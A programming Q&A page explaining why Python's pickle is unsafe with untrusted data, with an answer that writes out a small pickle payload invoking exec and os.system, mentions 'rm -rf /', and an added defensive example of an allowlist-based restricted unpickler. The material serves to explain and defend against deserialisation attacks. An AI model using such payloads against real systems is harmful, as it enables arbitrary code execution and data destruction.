Welcome to OStack Knowledge Sharing Community for programmer and developer-Open, Learning and Share

python - Untrusted pickle source

From the Python docs for pickle:

Warning: The pickle module is not secure. Only unpickle data you trust.

What would be an example of pickling and then un-pickling data that would do something malicious? I've only ever used pickle to save objects that don't necessarily JSON-encode well (date, decimal, etc.), so I don't have much experience with it or with what it's capable of outside of being a "simpler JSON" encoder.

What would be an example of something malicious that could be done with it?



1 Answer

0 votes
by (71.8m points)

Like Chase said, functions can be executed by unpickling. According to this source: https://intoli.com/blog/dangerous-pickles/, pickled objects are actually stored as bytecode instructions which are interpreted on opening (similar to Python itself). By writing pickle bytecode, it's possible to make a pickle "program" to do anything.

Here I made a pickle program to run the bash command say "malicious code", but you could run commands like rm -rf / as well.

I saved the following bytecode to a file:

c__builtin__
exec
(Vimport os; os.system('say "malicious code"')
tR.

and then unpickled it with:

import pickle

# Opening the file in binary mode and handing it to pickle.load is all it
# takes; the exec call runs while load() is still interpreting the opcodes.
with open('malicious', 'rb') as loadfile:
    data = pickle.load(loadfile)

I immediately heard some "malicious code".


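The answer shows the attack side; the defensive counterpart is the "Restricting Globals" pattern from the pickle docs, where `Unpickler.find_class` is overridden so that only an allowlist of classes can be resolved. The following is an added example (not code from the question, the answer, or the intoli post). It builds a protocol-0 pickle with the same GLOBAL/REDUCE opcode shape as the answer's payload but pointing at a harmless `os.getcwd` stand-in (an assumption chosen so the demo is safe to run), then shows that plain `pickle.loads` calls it during load while the restricted loader refuses it, and that the date/decimal payloads the question mentions still round-trip. The `SAFE_GLOBALS` allowlist and the helper names are this example's own.

```python
import io
import os
import pickle
import datetime
import decimal

# Constructed protocol-0 pickle, same opcode shape as the one in the answer:
#   c GLOBAL        -> push os.getcwd (assumption: harmless stand-in for exec)
#   ( MARK, t TUPLE -> empty argument tuple
#   R REDUCE        -> call os.getcwd()
#   . STOP
# The callable is benign here; what matters is that the call runs inside load().
GLOBAL_CALL_PICKLE = b"cos\ngetcwd\n(tR."

# Allowlist of (module, name) pairs the loader may resolve. Everything else,
# including os.*, builtins.exec and builtins.eval, is refused.
SAFE_GLOBALS = frozenset({
    ("datetime", "datetime"),
    ("datetime", "date"),
    ("decimal", "Decimal"),
})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals on the allowlist (the pattern
    recommended in the pickle docs under 'Restricting Globals')."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that applies the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def default_loader_calls_global() -> bool:
    """Show that plain pickle.loads executes the GLOBAL+REDUCE sequence:
    the loaded object is whatever os.getcwd() returned during unpickling."""
    result = pickle.loads(GLOBAL_CALL_PICKLE)
    return result == os.getcwd()


def restricted_loader_rejects_global() -> str:
    """Return the error message the restricted loader raises for the same
    bytes, or '' if it (wrongly) loaded them."""
    try:
        restricted_loads(GLOBAL_CALL_PICKLE)
    except pickle.UnpicklingError as exc:
        return str(exc)
    return ""


def restricted_loader_accepts_safe_types() -> bool:
    """Plain containers plus the date/decimal types from the question
    round-trip through the restricted loader unchanged."""
    payload = {
        "when": datetime.datetime(2024, 1, 2, 3, 4, 5),
        "day": datetime.date(2024, 1, 2),
        "amount": decimal.Decimal("19.99"),
        "tags": ["a", "b"],
    }
    return restricted_loads(pickle.dumps(payload)) == payload


if __name__ == "__main__":
    print("default pickle.loads ran os.getcwd():", default_loader_calls_global())
    print("restricted loader error:", restricted_loader_rejects_global())
    print("safe payload round-trips:", restricted_loader_accepts_safe_types())
```

The allowlist is the whole control: anything a pickle names that is not on it, including `builtins.exec` from the answer's payload, fails with `UnpicklingError` before it is ever called. For data that only needs dicts, lists, numbers and strings, the simpler fix is to use `json` and avoid pickle for untrusted input entirely.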